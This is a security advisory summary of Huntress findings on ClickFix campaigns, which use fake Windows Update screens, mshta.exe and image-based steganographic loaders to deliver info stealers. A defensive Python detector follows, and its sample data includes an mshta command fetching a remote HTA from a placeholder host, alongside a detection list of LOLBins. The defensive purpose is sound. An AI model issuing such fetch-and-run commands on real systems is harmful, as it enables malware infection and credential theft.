ClickFix Gets Creative: Malware Buried in Images
Summary:
ClickFix is a social‑engineering technique that tricks users into opening the Windows Run dialog (Win+R) and executing a command that has been silently copied to their clipboard. Earlier versions of this tactic relied on simple “Human Verification” or robot‑check pages, but attackers have recently changed tactics.
New campaigns observed by security firm Huntress deploy highly realistic fake Windows Update screens, complete with full‑screen blue splash pages and progress animations, to convince victims that a system update is in progress. When the fake update “finishes,” users are instructed to perform the familiar ClickFix action: open the Windows Run dialog, then paste and execute a malicious command. In doing so, the victim unknowingly launches mshta.exe, kicking off a multi‑stage infection chain.
Security Officer Comments:
According to Huntress, the latest ClickFix attacks lead to the deployment of info stealers like Rhadamanthys and LummaC2, which are designed to locate and exfiltrate data from victim systems. This includes browser credentials, banking information, keystrokes, screenshots, and other valuable information that can be used for further compromise. One of the interesting aspects of this campaign is its use of a .NET steganographic loader, which conceals shellcode within the pixel data of a PNG image. Instead of appending malicious content to the file, the loader AES‑decrypts an embedded PNG resource, reads its raw bitmap bytes, and reconstructs the shellcode from a single color channel using a custom XOR‑based decoding routine.
Suggested Corrections:
Recommendations from Huntress:
- Block the Windows Run box: Implement the registry modifications above or deploy GPO policies to block interaction with the Windows Run Box
- Security Awareness Training: Ensure users are trained on the ClickFix methodology, emphasising that legitimate CAPTCHA or Windows Update processes will never require pasting and running commands
- Monitor for suspicious process lineage: Use EDR telemetry to monitor for explorer.exe spawning mshta.exe, powershell.exe, or other living-off-the-land binaries with unexpected command lines
- Audit the RunMRU Registry Artefact: When investigating potential compromise, analysts can potentially verify if a user has entered commands into the Windows Run box by inspecting the “Most Recently Used” (MRU) list:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
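The last two recommendations (process-lineage monitoring and the RunMRU audit) can be exercised offline with the following added example; it is illustrative code written for this summary, not Huntress tooling. It assumes process-creation events are available as parent/child/command-line records, and that a RunMRU key dump is a mapping of value names (a, b, c, ...) to commands terminated by the literal two characters "\1", with the MRUList value giving most-recent-first ordering; all sample data is constructed.

```python
import re

# Living-off-the-land binaries the recommendations single out as children of explorer.exe.
SUSPICIOUS_CHILDREN = {"mshta.exe", "powershell.exe"}

# Constructed process-creation events (not real telemetry): parent image, child image, command line.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "child": "notepad.exe",
     "cmdline": "notepad.exe C:\\notes.txt"},
    {"parent": "explorer.exe", "child": "mshta.exe",
     "cmdline": "mshta.exe https://update.example.invalid/u.hta"},
    {"parent": "services.exe", "child": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# Constructed RunMRU dump: each value holds the typed command followed by the literal
# characters "\1"; MRUList lists the value names from most recent to least recent.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "cmd\\1",
    "b": "notepad\\1",
    "c": "mshta https://update.example.invalid/u.hta\\1",
}


def flag_process_lineage(events):
    """Return command lines of explorer.exe children that are in SUSPICIOUS_CHILDREN."""
    return [ev["cmdline"] for ev in events
            if ev["parent"].lower() == "explorer.exe"
            and ev["child"].lower() in SUSPICIOUS_CHILDREN]


def runmru_commands(runmru):
    """Reconstruct the Run-box history, most recent first, from a RunMRU key dump."""
    commands = []
    for name in runmru.get("MRUList", ""):
        raw = runmru.get(name, "")
        # Strip the trailing "\1" marker Explorer appends to each entry.
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def flag_runmru(runmru):
    """Return Run-box entries that invoke a flagged binary, with or without the .exe suffix."""
    pattern = re.compile(r"^\s*(mshta|powershell)(\.exe)?\b", re.IGNORECASE)
    return [cmd for cmd in runmru_commands(runmru) if pattern.match(cmd)]


if __name__ == "__main__":
    print("lineage hits:", flag_process_lineage(SAMPLE_EVENTS))
    print("Run-box hits:", flag_runmru(SAMPLE_RUNMRU))
```

On a live host the RunMRU mapping would come from the HKCU key listed above; the regex only covers the two binaries the text names, so extend SUSPICIOUS_CHILDREN and the pattern for other LOLBins in your environment.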
https://www.huntress.com/blog/clickfix-malware-buried-in-images